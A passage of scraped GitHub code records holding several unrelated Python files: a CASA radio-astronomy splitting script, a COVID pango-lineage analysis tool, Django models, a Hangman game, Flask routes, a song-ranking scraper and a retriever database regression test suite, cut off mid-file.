2020\n\n@author: yogesh\n\"\"\"\nimport casatasks\nimport casatools\nimport os\nimport logging\nfrom modules import ugfunctions as ugf\nfrom datetime import datetime\nfrom os import sys\nimport numpy as np\nms=casatools.ms()\nmsmd=casatools.msmetadata()\n\n#############################################################\n# SPLIT step\n#############################################################\n\ndef split(msfilename,mytargets,workdir,dosplit,gainspw1,flagsplitfile):\n if dosplit == True:\n #\tassert os.path.isdir(msfilename), \"dosplit = True but ms file not found.\"\n try:\n assert os.path.isdir(msfilename), \"dosplit = True but ms file not found.\"\n except AssertionError:\n logging.info(\"dosplit = True but ms file not found.\")\n sys.exit()\n logging.info(\"The data on targets will be split into separate files.\")\n# casalog.filter('INFO')\n\n \n for i in range(0,len(mytargets)):\n if os.path.isdir(str(workdir)+mytargets[i]+'split.ms') == True:\n logging.info(\"The existing split file will be deleted.\")\n os.system('rm -rf '+str(workdir)+mytargets[i]+'split.ms')\n logging.info(\"Splitting target source data.\")\n logging.info(gainspw1)\n splitfilename = ugf.mysplitinit(msfilename,workdir,mytargets[i],gainspw1,1)\n#############################################################\n# Flagging on split file\n#############################################################\n if flagsplitfile == True:\n try:\n assert os.path.isdir(splitfilename), \"flagsplitfile = True but the split file not found.\"\n except AssertionError:\n logging.info(\"flagsplitfile = True but the split file not found.\")\n sys.exit()\n logging.info(\"Now proceeding to flag on the split file.\")\n myantselect =''\n ugf.mytfcrop(splitfilename,'',myantselect,8.0,8.0,'DATA','')\n a, b = ugf.getbllists(splitfilename)\n tdev = 6.0\n fdev = 6.0\n ugf.myrflag(splitfilename,'',a[0],tdev,fdev,'DATA','')\n tdev = 5.0\n fdev = 5.0\n ugf.myrflag(splitfilename,'',b[0],tdev,fdev,'DATA','')\n logging.info(\"A flagging summary is provided for the MS file.\")\n #os.system('aoflagger -indirect-read -strategy S20rfistr.rfis '+splitfilename)\n os.system('aoflagger -indirect-read '+splitfilename)\n casatasks.flagdata(vis=splitfilename,mode='extend',growtime=100,growfreq=40)\n # ugf.flagsummary(splitfilename)\n#############################################################","repo_name":"yogeshchandola/Spectral-CAPTURE","sub_path":"split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4761422644","text":"'''\nFrom sequence file, obtain all the pango lineages, and for each one,\nfind the mutation string that corresponds to the consensus sequence\nfor that lineage, and show the most commmon forms.\n'''\n## note, consensus is the most expensive part of the computation\n## use --consensusnever to avoid that computation\n\nfrom collections import Counter\nimport argparse\n\nimport verbose as v\nfrom hamming import hamming\n\nimport covid\nimport mutant\nimport commonforms as cf\n\ndef getargs():\n '''get arguments from command line'''\n ap = argparse.ArgumentParser(description=__doc__)\n paa = ap.add_argument\n covid.corona_args(ap)\n paa(\"--npatterns\",\"-n\",type=int,default=0,\n help=\"How many of the most common patterns per lineage (0=all)\")\n paa(\"--mincount\",\"-m\",type=int,default=10,\n help=\"Show only patters with at least this many counts\")\n paa(\"--consensusalways\",\"-c\",action=\"store_true\",\n help=\"Always show consensus, even if not common\")\n paa(\"--consensusnever\",action=\"store_true\",\n help=\"Do not compute consensus for each form [faster compute]\")\n paa(\"--protein\",default=\"Spike\",\n help=\"Protein name to be used in the header\")\n paa(\"--baseline\",default=\"XBB.1.5\",\n choices=tuple(covid.BASELINE_MSTRINGS),\n help=\"Use this sequence as basline for mutation strings\")\n paa(\"--bylineage\",action=\"store_true\",default=True,\n help=\"Partition sequences by pango lineage\")\n paa(\"--notbylineage\",action=\"store_false\",dest='bylineage',\n help=\"Do not partition sequences by pango lineges\")\n paa(\"--lineagebaseline\",action=\"store_true\",\n help=\"Use each lineage most common form as mstring baseline for that lineage\")\n paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n help=\"verbose\")\n args = ap.parse_args()\n if args.consensusalways and args.consensusnever:\n raise RuntimeError(\"Cannot have both --consensusalways and --consensusnever\")\n if args.baseline == 'Wuhan':\n args.baseline = None\n return args\n\ndef print_header(args):\n '''print the header before the table itself'''\n print(f\"COMMON FORMS OF {args.protein.upper()} \"\n f\"WITH A GIVEN PANGO LINEAGE DESIGNATION\")\n print()\n print(f\"For each lineage, we show the most common forms of {args.protein}, \"\n \"as well as their counts within (and percentages of) the lineage. \"\n \"[Note that if a lineage contains several divergent forms, \"\n \"the consensus form might not be found among these common forms.] \"\n \"Also shown is the Hamming distance (HD) between each form \"\n \"and the most common form in that lineage. Deletions relative to \"\n \"the baseline reference strain are indicated with a dash \"\n \"(e.g. the two amino acid deletion at positions 156-157 is \"\n \"indicated with 'E156-,F157-'), \"\n \"and insertions are denoted by a plus sign \"\n \"(e.g. an extra T at position 143 is written '+143T'). \")\n if args.baseline:\n print(f\"[Note: Mutation strings are relative to baseline {args.baseline}].\")\n if args.lineagebaseline:\n print(\"[Note: Mutation strings are relative to the most common variant in each lineage.]\")\n print()\n\n count_forms = f\"the {args.npatterns} most common\" if args.npatterns \\\n else \"all the\"\n min_count = \\\n f\" that have at least {args.mincount} counts \" \\\n \"(but we always show the most common form)\" \\\n if args.mincount>1 else \"\"\n consensus_always = \\\n \"And we always show the consensus form; \" \\\n \"this form has the most common amino acid at each position. \" \\\n if args.consensusalways else \"\"\n print(f\"We show {count_forms} forms{min_count}. {consensus_always}\")\n\ndef main(args):\n '''pangocommonforms main'''\n\n if args.baseline and args.lineagebaseline:\n raise RuntimeError('Cannot have both --baseline and --lineagebaseline')\n if not args.bylineage and args.lineagebaseline:\n v.print('Warning: not recommended to use --notbylineage AND --lineagebaseline.')\n\n print_header(args)\n\n firstseq,seqlist = cf.get_input_sequences(args)\n mut_manager = mutant.MutationManager(firstseq)\n\n last_days = f\" in the last {args.days} days from our last update,\"\n last_days = last_days if args.days else \"\"\n try:\n (f_date,t_date) = covid.range_of_dates(seqlist)\n except ValueError:\n (f_date,t_date) = ('Unknown','Unknown')\n\n print(f\"This output is based on sequences sampled{last_days} \"\n \"from %s to %s.\" % (f_date,t_date))\n\n ## Partition seqlist by lineages, separate list for each lineage\n lin_partition = cf.LineagePartition(seqlist)\n\n base_mut = cf.get_baseline_mutation(args.baseline,mut_manager,\n lin_partition,args.protein)\n\n if not args.bylineage:\n lin_partition = cf.LineagePartition(seqlist,bylineage=False)\n\n ## Print header for table:\n print()\n print(lin_partition.format(\"Pango\"),\n \"Lineage Form Form\")\n print(lin_partition.format(\"Lineage\"),\n \" Count Count Pct HD [Form as mutation string]\")\n\n for lin in lin_partition.lineages:\n\n seqlin = lin_partition.sequences[lin]\n countlin = lin_partition.counts[lin]\n fmtlin = lin_partition.format(lin)\n\n print()\n\n ## First get consensus form\n cons = cf.consensus(seqlin) if not args.consensusnever else None\n\n ## Now get most common forms\n cntr = Counter(s.seq for s in seqlin)\n cflag = False\n cntrlist = sorted(cntr,key=cntr.get,reverse=True)\n if args.npatterns:\n cntrlist = cntrlist[:args.npatterns]\n for n,comm in enumerate(cntrlist):\n cnt = cntr[comm]\n if n>0 and cnt < args.mincount:\n break\n cons_string = \"\"\n if comm == cons:\n cflag = True\n cons_string = \"(consensus)\"\n m = mut_manager.get_mutation(comm)\n mstring = m.relative_to(base_mut) if args.baseline else str(m)\n\n if args.lineagebaseline:\n if n==0:\n lineage_baseline = m\n else:\n mstring = m.relative_to(lineage_baseline)\n\n if n == 0:\n top_comm = comm\n h = hamming(top_comm,comm)\n print(\"%s %7d %6d %5.1f%% %3d %s %s\" %\n (fmtlin,countlin,cnt,100*cnt/countlin,\n h,mstring,cons_string))\n if args.consensusalways and not cflag:\n h = hamming(top_comm,cons)\n m = mut_manager.get_mutation(cons)\n mstring = m.relative_to(base_mut) if args.baseline else str(m)\n cnt = cntr[cons]\n print(\"%s %7d %6d %5.1f%% %3d %s %s\" %\n (fmtlin,countlin,cnt,100*cnt/countlin,\n h,mstring,\"(consensus)\"))\n\nif __name__ == \"__main__\":\n\n _args = getargs()\n v.verbosity(_args.verbose)\n\n main(_args)\n","repo_name":"jt-lanl/cov-voc","sub_path":"pangocommonforms.py","file_name":"pangocommonforms.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27497229943","text":"\nfrom django.db import models\nfrom django.db.models import Q, UniqueConstraint\nfrom django.contrib.auth import get_user_model\nfrom django.template.defaultfilters import slugify\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework.exceptions import ValidationError\nfrom services.mixins import ModelDeleteMixin, ModelUpdateMixin\n\nfrom .querysets import DepartmentMemberQuerySet, DepartmentQuerySet, DesignationQuerySet\n\nUser = get_user_model()\n\n\nclass Department(ModelDeleteMixin, ModelUpdateMixin, models.Model):\n CACHED_FIELDS = ['pk', 'name', 'description']\n restricted_fields = ['pk', 'slug']\n error_messages = {\n \"CREATE\": \"Department create failed.\",\n \"UPDATE\": \"Department update failed.\",\n \"DELETE\": \"Department delete failed.\",\n \"RETRIEVE\": \"Department retrieve failed.\",\n \"PATCH\": \"Department patch failed.\",\n }\n\n name = models.CharField(\n verbose_name=_(\"Department Name\"),\n max_length=200,\n null=False,\n unique=True,\n blank=False,\n )\n slug = models.SlugField(\n verbose_name=_(\"Department Name SLug\"),\n unique=True,\n null=False,\n )\n description = models.TextField(\n verbose_name=_(\"Department Description\"),\n null=False,\n blank=False,\n )\n objects = DepartmentQuerySet.as_manager()\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.name)\n self.clean()\n return super().save(*args, **kwargs)\n\n\nclass Designations(ModelDeleteMixin, ModelUpdateMixin, models.Model):\n CACHED_FIELDS = ['pk', 'department', 'title']\n restricted_fields = ['pk']\n error_messages = {\n \"CREATE\": \"Designation create failed.\",\n \"UPDATE\": \"Designation update failed.\",\n \"DELETE\": \"Designation delete failed.\",\n \"RETRIEVE\": \"Designation retrieve failed.\",\n \"PATCH\": \"Designation patch failed.\",\n }\n\n department = models.ForeignKey(\n to=Department,\n on_delete=models.CASCADE,\n related_name=\"department_designations\",\n verbose_name=_(\"Department Designations\")\n )\n title = models.CharField(\n verbose_name=_(\"Designation Title\"),\n max_length=100,\n null=False,\n blank=False,\n )\n objects = DesignationQuerySet.as_manager()\n\n class Meta:\n unique_together = [['department', 'title']]\n\n\n def __str__(self):\n return '{}-{}'.format(self.department, self.title)\n\n\nclass DepartmentMember(ModelDeleteMixin, ModelUpdateMixin, models.Model):\n restricted_fields = ['pk', 'member', '']\n error_messages = {\n \"CREATE\": \"Department create failed.\",\n \"UPDATE\": \"Department update failed.\",\n \"DELETE\": \"Department delete failed.\",\n \"RETRIEVE\": \"Department retrieve failed.\",\n \"PATCH\": \"Department patch failed.\",\n \"DEPARTMENT_MISMATCH\": \"Member department and department designation did not match.\",\n \"MULTIPLE_DEPARTMENT_HEAD\": \"Department Head of this department already exist\"\n }\n\n member = models.OneToOneField(\n to=User,\n on_delete=models.CASCADE,\n related_name=\"user_department\",\n null=False,\n blank=False,\n verbose_name=_(\"Member\"),\n primary_key=True,\n )\n department = models.ForeignKey(\n to=Department,\n on_delete=models.CASCADE,\n related_name=\"department_members\",\n null=False,\n blank=False,\n verbose_name=\"Department\"\n )\n designation = models.ForeignKey(\n to=Designations,\n on_delete=models.RESTRICT,\n null=False,\n blank=False,\n verbose_name=\"designated_members\"\n )\n is_head = models.BooleanField(\n verbose_name=_(\"Department Head\"),\n default=False,\n )\n department_name = models.CharField(\n verbose_name=_(\"Department Name\"),\n max_length=200,\n null=True,\n blank=True,\n default=None\n )\n designation_title = models.CharField(\n verbose_name=_(\"Designation Title\"),\n max_length=100,\n null=True,\n blank=True,\n default=None\n )\n objects = DepartmentMemberQuerySet.as_manager()\n\n class Meta:\n constraints = [\n UniqueConstraint(\n fields=[\"department\"],\n condition=Q(is_head=True),\n name=\"one_head_per_department\"\n )\n ]\n def __str__(self):\n return \"{}\".format(self.member.first_name)\n\n def clean(self):\n if self.department != self.designation.department:\n raise ValidationError({\"detail\": [self.error_messages[\"DEPARTMENT_MISMATCH\"]]})\n\n def save(self, *args, **kwargs):\n self.clean()\n super().save(*args, **kwargs)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"pi3o1416/task-management","sub_path":"department/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18994363280","text":"from random import choice\nimport time\nwith open(\"Words.txt\") as f:\n Words = f.readlines()\n\nThe_Dict = {}\nfor i in range(len(Words)):\n The_Dict.update({Words[i].split(\".\")[0]:Words[i].split(\".\")[1]})\n\n \n# Extracting Word from the dictionary to a list\nWord_List = []\nfor items in The_Dict.keys():\n Word_List.append(items)\n\n# Function for Extracting a random word from the Given List\ndef RanWord(List):\n return choice(List)\n\n# Function for analysing the user input in the word \ndef Analysis(Word ,UserInput):\n No_Of_Occurence = Word.count(UserInput)\n if No_Of_Occurence == 1:\n return [Word.index(UserInput)]\n \n elif No_Of_Occurence >= 2:\n O1 = Word.index(UserInput)\n O2 = Word.rindex(UserInput)\n return [O1,O2] \n\n elif No_Of_Occurence == 0:\n return []\n \n#Function for Filtering the word for More then 2 occurence of a given input \ndef Filter(Word, UserInput, IndexList):\n No_Of_Occurence = Word.count(UserInput)\n \n if No_Of_Occurence>len(IndexList):\n \n while No_Of_Occurence >= len(IndexList):\n Sliced_Word = Word[IndexList[-2]+1:IndexList[-1]]\n \n a = Sliced_Word.find(UserInput)\n b = Sliced_Word.rfind(UserInput)\n \n if a != None and b == None:\n IndexList.append(a + len(Word[:IndexList[-2]+1]))\n elif a != None and b != None:\n IndexList.append(a + len(Word[:IndexList[-2]+1]))\n IndexList.append(b + len(Word[:IndexList[-1]-1]))\n Filter(Word, UserInput, IndexList)\n\n return IndexList.pop(len(IndexList)-1)\n else:\n return IndexList\n\n# Function for Replacing the dash Dashed List with the User input\ndef Dash_Replace(DashList, IndexList, UserInput):\n if len(IndexList) == 0:\n DashList = DashList \n else:\n for Index in IndexList:\n DashList.pop(Index)\n DashList.insert(Index, UserInput)\n return DashList\n\n# Function for Replacing the word with New word with removed alphabets\ndef Word_Replace(New_Word, UserInput):\n \n return New_Word.replace(UserInput, \"\")\n\ndef Main_Game():\n # Generating the Random Word\n Word = RanWord(Word_List) \n New_Word = Word \n\n # Generating the DashList for Word\n DashList = []\n for i in range(len(Word)):\n DashList.append(\"_ \")\n\n # Generating the Dashlist for Hangman\n H_Dashlist = [\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \",\"_ \"]\n HangManList = [\"Y\",\"O\", \"U\", \"H\", \"A\", \"N\", \"G\", \"M\", \"A\", \"N\"]\n HangmanEnd = []\n Already_Guessed = []\n i = 0\n while i<11:\n \n # print(\"\\nTo Quit Enter 'QUIT'\\n\".center(100))\n print(f'ChancesLeft:{10-i}\\n'.center(100))\n if (10-i) ==1:\n print(\"Last Chance!!\\n\".center(100)) \n\n # Making the Dashed String for Hangman\n \n H_Dash_Str = \"\"\n for j in range(len(H_Dashlist)):\n H_Dash_Str = H_Dash_Str + H_Dashlist[j]\n print(H_Dash_Str.center(100),\"\\n\")\n\n # Making a Dashed String for Word\n \n Dash_Str = \"\".center(42)\n for k in range(len(DashList)):\n Dash_Str = Dash_Str + DashList[k]\n print(Dash_Str,\"\\n\")\n print(f\"HINT:{The_Dict.get(Word)}\".center(100),)\n\n # Setting the Loosing game Settings\n \n if H_Dash_Str == 'YOUHANGMAN':\n print(f\"You Loose the Game The Word Was:{Word}\\n\".center(100))\n break\n else:\n try:\n if New_Word == \"\":\n print(\"******************You Won the Game!*******************\\n\".center(100))\n print(\"********************************************************************************************************************************\".center(20))\n time.sleep(2)\n break\n else:\n # Taking the User's Input\n UserInput = input(\"Enter Your Guess: \\n\".center(100)).capitalize()\n \n if UserInput in Already_Guessed:\n print(f\"You Already guessed {UserInput}\".center(100))\n else:\n if UserInput in New_Word:\n # Generating the Index List\n IndexList = Analysis(Word, UserInput)\n # print(IndexList, 'From Program') # ERROR CHECKING HERE\n Filter(Word, UserInput, IndexList)\n # print(IndexList, 'After filter') # ERROR CHECKING\n\n # Generating the DashList with Replaced word\n DashList = Dash_Replace(DashList, IndexList, UserInput)\n \n # print(DashList) # CHECKING FOR ERROR!\n\n # Genrating the New Word\n New_Word = Word_Replace(New_Word, UserInput)\n # print(New_Word)\n # print(Word) # SETTED HERE FOR CHECKING FOR AN ERROR.\n print(\"Your Guess was True!\".center(100))\n Already_Guessed.append(UserInput)\n\n elif UserInput not in New_Word:\n print(\"Your Guess was Wrong!\\n\".center(100))\n H_Dashlist.pop(i)\n H_Dashlist.insert(i, HangManList[i])\n HangmanEnd.append(i)\n i += 1 \n except Exception as e:\n print(\"You Just Entered Something Wrong raising error\", e,\"Please Try Again!\") \n \n print(\"****************************************************************************************************\".center(30))\n time.sleep(1)\n YourChoise = input(\"To Play Again Enter 'Y' else 'N':\".center(60)).capitalize()\n if YourChoise == \"Y\":\n Main_Game()\n else:\n print(\"*********************************Thanks for playing!**************************\".center(100))\n time.sleep(3)\n quit()\n \nMain_Game()\n","repo_name":"Jitesh-Chaturvedy/HANGMAN","sub_path":"Hangman.py","file_name":"Hangman.py","file_ext":"py","file_size_in_byte":6253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73977761794","text":"from models.clients import clients\nfrom flask import request, jsonify\n#from model import db\n\n\n@app.route(\"/clients/\", methods=[\"GET\"])\ndef find_client(client_id: str) -> Any:\n \"\"\"Поиск клиента по id.\"\"\"\n client = Client()\n try:\n response = client.get_client_info(client_id)\n if response is None:\n return Response(\"Объект в базе не найден.\", status=404)\n return str(response)\n except Exception:\n return Response(\"Неправильный запрос.\", status=400)\n\n\n@app.route(\"/clients/\", methods=[\"POST\"])\ndef create_client() -> Response:\n \"\"\"Создание записи о клиенте.\"\"\"\n client_info = request.get_json()\n try:\n client = Client(id=client_info[\"id\"], name=client_info[\"name\"])\n client.create_client()\n return Response(\"Запись создана.\", status=201)\n except Exception:\n return Response(\"Неправильный запрос.\", status=400)\n\n\n@app.route(\"/clients/\", methods=[\"DELETE\"])\ndef delete_client(client_id: str) -> Response:\n \"\"\"Удаление клиента из системы.\"\"\"\n client = Client()\n try:\n response = client.get_client_info(client_id)\n if response is None:\n return Response(\"Объект в базе не найден.\", status=404)\n client.delete_client(client_id)\n return Response(\"Удалено.\", status=201)\n except Exception:\n return Response(\"Неправильный запрос.\", status=400)\n\n","repo_name":"ArkadiyVoronov/OnyxTaxi","sub_path":"views/view_clients.py","file_name":"view_clients.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17935646468","text":"#!/usr/bin/python3\n\n\n# UtaTenの歌詞ランキングTop30を取得する\nimport requests, bs4\n\n\n# リクエストとスープ\ndef requesoup(url):\n return bs4.BeautifulSoup(requests.get(url).text, 'lxml')\n\n\n# 歌詞情報を取ってくる\ndef songRank(page):\n elem_box = ['SongRank SongName SingerName']\n for elem in page.find_all('article', class_='lst_boxArea'):\n songRank = elem.find('span', class_='icoTxt_rank').string.strip()\n songName = elem.find('h3', class_='boxArea_ttl').string.strip()\n singerName = elem.find('p', class_='boxArea_artists').string.strip()\n elem_set = '{} {} {}'.format(songRank, songName, singerName)\n elem_box.append(elem_set)\n return elem_box\n\n\n# 表示\ndef display(d):\n print(d)\n\n\n# 実行\nif __name__ == '__main__':\n url = 'https://utaten.com/lyricPvRanking/index'\n display('UtaTen歌詞ランキングTOP30!')\n for rank in songRank(requesoup(url)):\n display(rank)\n","repo_name":"n18001/life_hack","sub_path":"songrank.py","file_name":"songrank.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37822189758","text":"from __future__ import absolute_import\n\nimport imp\nimport numpy as np\nimport os\nimport shlex\nimport shutil\nimport subprocess\nimport sys\n\nimport time\n\nfrom imp import reload\n\nfrom retriever import download\nfrom retriever import fetch\nfrom retriever import install_csv\nfrom retriever import install_json\nfrom retriever import install_mysql\nfrom retriever import install_postgres\nfrom retriever import install_sqlite\nfrom retriever import install_xml\nfrom retriever.lib.defaults import ENCODING, DATA_DIR\nfrom retriever.lib.load_json import read_json\n\nencoding = ENCODING.lower()\n\nreload(sys)\nif hasattr(sys, 'setdefaultencoding'):\n sys.setdefaultencoding(encoding)\nimport pytest\nfrom retriever.lib.engine_tools import getmd5\nfrom retriever.engines import engine_list\n\n# Set postgres password, Appveyor service needs the password given\n# The Travis service obtains the password from the config file.\nos_password = \"\"\npgdb_host = \"localhost\"\nmysqldb_host = \"localhost\"\ntestdb_retriever = \"testdb_retriever\"\ntestschema = \"testschema_retriever\"\n\nif os.name == \"nt\":\n os_password = \"Password12!\"\n\ndocker_or_travis = os.environ.get(\"IN_DOCKER\")\nif docker_or_travis == \"true\":\n os_password = 'Password12!'\n pgdb_host = \"pgdb_retriever\"\n mysqldb_host = \"mysqldb_retriever\"\n\nmysql_engine, postgres_engine, sqlite_engine, msaccess_engine, \\\ncsv_engine, download_engine, json_engine, xml_engine = engine_list\nfile_location = os.path.dirname(os.path.realpath(__file__))\nretriever_root_dir = os.path.abspath(os.path.join(file_location, os.pardir))\nworking_script_dir = os.path.abspath(os.path.join(retriever_root_dir, \"scripts\"))\nHOMEDIR = os.path.expanduser('~')\nscript_home = '{}/.retriever/scripts'.format(HOMEDIR)\n\ndownload_md5 = [\n ('mt-st-helens-veg', 'd5782e07241cb3fe9f5b2e1bb804a794'),\n ('bird-size', '45c7507ae945868c71b5179f7682ea9c'),\n ('mammal-masses', 'b54b80d0d1959bdea0bb8a59b70fa871')\n]\n\ndb_md5 = [\n ('flensburg_food_web', '89c8ae47fb419d0336b2c22219f23793'),\n ('bird_size', '98dcfdca19d729c90ee1c6db5221b775'),\n ('mammal_masses', '6fec0fc63007a4040d9bbc5cfcd9953e')\n]\n\nspatial_db_md5 = [\n (\"test-eco-level-four\", [\"gid\", \"us_l3code\", \"na_l3code\",\"na_l2code\"], 'd1c01d8046143e9700f5cf92cbd6be3d'),\n (\"test-raster-bio1\", [\"rid\", \"filename\"], '27e0472ddc2da9fe807bfb48b786a251'),\n (\"test-raster-bio2\", [\"rid\", \"filename\"], '2983a9f7e099355db2ce2fa312a94cc6'),\n (\"test-us-eco\", [\"gid\", \"us_l3code\", \"na_l3code\", \"na_l2code\"], 'eaab9fa30c745557ff6ba7c116910b45')\n]\n\n\n# Tuple of (dataset_name, list of dict values corresponding to a table)\nfetch_tests = [\n ('iris',\n [{'Iris': [[5.1, 3.5, 1.4, 0.2, 'Iris-setosa'],\n ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'classes']]\n }]\n ),\n ('flensburg-food-web',\n [{'nodes': [\n [2, 2, 1, 'Adult', 2.1, 'Carrion', 'Detritus', 'Detritus/Stock', 'Assemblage',\n '', '', '', '', '', None, None, 'Low', '', None, None, None, None, None, None,\n None, None, '', '', None, None, '', None, '', None, None, None, '', '', '',\n None, None],\n ['node_id', 'species_id', 'stage_id', 'stage', 'species_stageid', 'workingname',\n 'organismalgroup', 'nodetype', 'resolution', 'resolutionnotes', 'feeding',\n 'lifestylestage', 'lifestylespecies', 'consumerstrategystage', 'systems',\n 'habitataffiliation', 'mobility', 'residency', 'nativestatus',\n 'bodysize_g', 'bodysizeestimation', 'bodysizenotes', 'bodysizen',\n 'biomass_kg_ha', 'biomassestimation', 'biomassnotes', 'kingdom', 'phylum',\n 'subphylum', 'superclass', 'classes', 'subclass', 'ordered', 'suborder',\n 'infraorder', 'superfamily', 'family', 'genus', 'specific_epithet', 'subspecies',\n 'node_notes']\n ],\n 'links': [\n [39, 79, 39, 79, 1, 1, 14, 'Concomitant Predation on Symbionts',\n None, None, None, None, None, None, None,\n None],\n ['consumernodeid', 'resourcenodeid', 'consumerspeciesid', 'resourcespeciesid',\n 'consumerstageid', 'resourcestageid', 'linknumber', 'linktype', 'linkevidence',\n 'linkevidencenotes', 'linkfrequency', 'linkn',\n 'dietfraction', 'consumptionrate', 'vectorfrom', 'preyfrom']\n ]\n }])\n]\n\nfetch_order_tests = [\n ('acton-lake',\n ['ActonLakeDepth', 'ActonLakeIntegrated', 'StreamDischarge', 'StreamNutrients',\n 'SiteCharacteristics']\n ),\n ('forest-plots-michigan',\n ['all_plots_1935_1948', 'all_plots_1974_1980', 'swamp', 'species_codes',\n 'upland_plots_1989_2007', 'sampling_history']\n )\n]\n\npython_files = ['flensburg_food_web']\n\n\ndef setup_module():\n \"\"\"Update retriever scripts and cd to test directory to find data.\"\"\"\n os.chdir(retriever_root_dir)\n subprocess.call(['cp', '-r', 'test/raw_data', retriever_root_dir])\n\n\ndef teardown_module():\n \"\"\"Cleanup temporary output files and return to root directory.\"\"\"\n os.chdir(retriever_root_dir)\n shutil.rmtree(os.path.join(retriever_root_dir, 'raw_data'))\n subprocess.call(['rm', '-r', 'testdb_retriever.sqlite'])\n\n\ndef get_script_module(script_name):\n \"\"\"Load a script module\"\"\"\n if script_name in python_files:\n file, pathname, desc = imp.find_module(script_name,\n [working_script_dir])\n return imp.load_module(script_name + '.py', file, pathname, desc)\n return read_json(os.path.join(retriever_root_dir, 'scripts', script_name))\n\n\ndef get_csv_md5(dataset, engine, tmpdir, install_function, config, cols=None):\n workdir = tmpdir.mkdtemp()\n src = os.path.join(retriever_root_dir, 'scripts')\n dest = os.path.join(str(workdir), 'scripts')\n subprocess.call(['cp', '-r', src, dest])\n workdir.chdir()\n final_direct = os.getcwd()\n engine.script_table_registry = {}\n engine_obj = install_function(dataset.replace('_', '-'), **config)\n time.sleep(5)\n engine_obj.to_csv(select_columns=cols)\n # need to remove scripts before checking md5 on dir\n subprocess.call(['rm', '-r', 'scripts'])\n current_md5 = getmd5(data=final_direct, data_type='dir')\n os.chdir(retriever_root_dir)\n return current_md5\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_sqlite_regression(dataset, expected, tmpdir):\n \"\"\"Check for sqlite regression.\"\"\"\n subprocess.call(['rm', '-r', 'testdb_retriever.sqlite'])\n dbfile = 'testdb_retriever.sqlite'\n if os.path.exists(dbfile):\n subprocess.call(['rm', '-r', dbfile])\n # SQlite should install datasets into a different folder from where .csv are dumped\n # This avoids having the `testdb.sqlite` being considered for md5 sum\n sqlite_engine.opts = {\n 'engine': 'sqlite',\n 'file': dbfile,\n 'table_name': '{db}_{table}',\n 'data_dir': DATA_DIR}\n interface_opts = {'file': dbfile, 'data_dir': retriever_root_dir}\n assert get_csv_md5(dataset, sqlite_engine, tmpdir, install_sqlite, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_postgres_regression(dataset, expected, tmpdir):\n \"\"\"Check for postgres regression.\"\"\"\n cmd = 'psql -U postgres -d ' + testdb_retriever + ' -h ' + pgdb_host + ' -w -c \\\"DROP SCHEMA IF EXISTS ' + testschema + ' CASCADE\\\"'\n subprocess.call(shlex.split(cmd))\n postgres_engine.opts = {'engine': 'postgres',\n 'user': 'postgres',\n 'password': os_password,\n 'host': pgdb_host,\n 'port': 5432,\n 'database': testdb_retriever,\n 'database_name': testschema,\n 'table_name': '{db}.{table}'}\n interface_opts = {\"user\": 'postgres',\n \"password\": postgres_engine.opts['password'],\n 'host': postgres_engine.opts['host'],\n 'port': postgres_engine.opts['port'],\n \"database\": postgres_engine.opts['database'],\n \"database_name\": postgres_engine.opts['database_name'],\n \"table_name\": postgres_engine.opts['table_name']}\n assert get_csv_md5(dataset, postgres_engine, tmpdir, install_postgres, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_mysql_regression(dataset, expected, tmpdir):\n cmd = 'mysql -u travis -Bse \"DROP DATABASE IF EXISTS {testdb_retriever}\"'.format(testdb_retriever=testdb_retriever)\n subprocess.call(shlex.split(cmd))\n mysql_engine.opts = {'engine': 'mysql',\n 'user': 'travis',\n 'password': '',\n 'host': mysqldb_host,\n 'port': 3306,\n 'database_name': testdb_retriever,\n 'table_name': '{db}.{table}'}\n interface_opts = {\"user\": mysql_engine.opts['user'],\n # 'password': mysql_engine.opts['password'],\n 'host': mysql_engine.opts['host'],\n 'port': mysql_engine.opts['port'],\n \"database_name\": mysql_engine.opts['database_name'],\n \"table_name\": mysql_engine.opts['table_name']}\n assert get_csv_md5(dataset, mysql_engine, tmpdir, install_mysql, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_xmlengine_regression(dataset, expected, tmpdir):\n \"\"\"Check for xmlenginee regression.\"\"\"\n xml_engine.opts = {\n 'engine': 'xml',\n 'table_name': '{db}_output_{table}.xml',\n 'data_dir': DATA_DIR}\n interface_opts = {'table_name': '{db}_output_{table}.xml'}\n assert get_csv_md5(dataset, xml_engine, tmpdir, install_xml, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_jsonengine_regression(dataset, expected, tmpdir):\n \"\"\"Check for jsonenginee regression.\"\"\"\n json_engine.opts = {\n 'engine': 'json',\n 'table_name': '{db}_output_{table}.json',\n 'data_dir': DATA_DIR}\n interface_opts = {'table_name': '{db}_output_{table}.json'}\n assert get_csv_md5(dataset, json_engine, tmpdir, install_json, interface_opts) == expected\n\n\n@pytest.mark.parametrize(\"dataset, expected\", db_md5)\ndef test_csv_regression(dataset, expected, tmpdir):\n \"\"\"Check csv regression.\"\"\"\n csv_engine.opts = {\n 'engine': 'csv',\n 'table_name': '{db}_output_{table}.csv',\n 